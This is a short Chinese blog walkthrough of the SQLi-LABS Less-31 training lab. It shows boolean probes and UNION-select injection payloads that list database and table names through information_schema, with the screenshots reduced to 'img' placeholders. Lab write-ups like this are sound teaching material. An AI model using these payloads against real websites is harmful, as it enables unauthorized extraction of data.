SQLi LABS Less-31

本文阅读 1 分钟
首页 安全分享,WEB安全 正文

第31关的源码中并未对参数做过多的过滤,只是在参数两边拼接了双引号和括号

img

 img

 img

 

在url地址栏中输入 1") and true-- a,使SQL恒成立,页面正常显示

img

 再输入 1") and false-- a,使SQL恒不成立,页面空显示

img

 由此判断存在SQL注入,注入点为双引号+括号的字符型注入

页面有显示位,我们可以使用联合注入进行脱库

-1") union select 1,2,
(select group_concat(schema_name) from information_schema.schemata)
-- a

img

 

脱表

-1") union select 1,2,
(select group_concat(table_name) from information_schema.tables 
 where table_schema='security')
-- a

img

 

本文为互联网自动采集或经作者授权后发布,本文观点不代表立场,若侵权下架请联系我们删帖处理!文章出自:https://blog.csdn.net/wangyuxiang946/article/details/119731185
-- 展开阅读全文 --
BUUCTF Web [极客大挑战 2019]Knife
« 上一篇 06-24
安全面试之XSS(跨站脚本攻击)
下一篇 » 07-24

发表评论

成为第一个评论的人

热门文章

标签TAG

最近回复